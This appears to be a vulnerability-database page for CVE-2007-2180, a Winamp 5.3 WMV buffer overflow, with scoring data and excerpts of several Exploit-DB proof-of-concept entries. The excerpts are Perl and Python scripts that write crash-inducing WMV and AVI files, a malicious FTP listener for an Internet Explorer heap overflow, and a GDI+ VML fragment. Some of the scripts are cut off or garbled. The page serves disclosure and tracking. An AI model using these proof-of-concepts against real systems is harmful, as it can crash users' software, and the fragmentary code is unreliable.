CVE-2007-2180
published 2007-04-24CVE-2007-2180: Buffer overflow in Nullsoft Winamp 5.3 allows user-assisted remote attackers to cause a denial of service (crash) via a crafted WMV file.
PriorityP424high7.1CVSS 2.0
AVNACMAuNCNINAC
EXPLOIT
EPSS
3.39%
87.3th percentile
Buffer overflow in Nullsoft Winamp 5.3 allows user-assisted remote attackers to cause a denial of service (crash) via a crafted WMV file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
exploitdb·2008-09-28
CVE-2007-5348 Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
Microsoft Internet Explorer - GDI+ (PoC) (MS08-052)
---
ef\:* { behavior: url(#default#VML); }
MS08-052: GDI+ Vulnerability
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180
Credit:
John Smith,
Evil Fingers
Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');
ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
# milw0rm.com [2008-09-28]
Exploit-DB
Winamp 5.3 - '.wmv' Remote Denial of Service
exploitdb·2007-04-19
CVE-2007-2180 Winamp 5.3 - '.wmv' Remote Denial of Service
Winamp 5.3 - '.wmv' Remote Denial of Service
---
#!/usr/bin/perl
# --------------------------------- Winamp ./exploit.wmv");
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print wmv "\x4D\x54\x68\x64";
close(wmv);
# Tested :
# --- WINAMP 5.3 Version ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# milw0rm.com [2007-04-19]
Exploit-DB
Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
exploitdb·2007-03-09
CVE-2007-0217 Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
---
#!/usr/bin/perl
# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.
use IO::Socket;
use strict;
# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
# Wait for initial connection and send
Exploit-DB
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
exploitdb·2007-02-05
CVE-2007-0811 Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
---
Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
AmesianX, RC_No1 in powerhacker.net (
Exploit-DB
Microsoft Windows Explorer - '.AVI' File Denial of Service
exploitdb·2007-01-24
CVE-2007-0562 Microsoft Windows Explorer - '.AVI' File Denial of Service
Microsoft Windows Explorer - '.AVI' File Denial of Service
---
print "-----------------------------------------------------------------------------------"
print "Explorer.exe version 6.0.2900.2180 .avi file Denial of Service"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Tested on Windows XP Professional SP2 all patched"
print "right click of the mouse on the file to see Explorer.exe die"
print "-----------------------------------------------------------------------------------"
fileOut = open('die.avi','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()
# milw0rm.com [2007-01-24]
No writeups or analysis indexed.
http://securityreason.com/securityalert/2601http://www.securityfocus.com/archive/1/466291/100/0/threadedhttp://www.securityfocus.com/bid/23568https://exchange.xforce.ibmcloud.com/vulnerabilities/33764https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15697https://www.exploit-db.com/exploits/3768http://securityreason.com/securityalert/2601http://www.securityfocus.com/archive/1/466291/100/0/threadedhttp://www.securityfocus.com/bid/23568https://exchange.xforce.ibmcloud.com/vulnerabilities/33764https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15697https://www.exploit-db.com/exploits/3768
2007-04-24
Published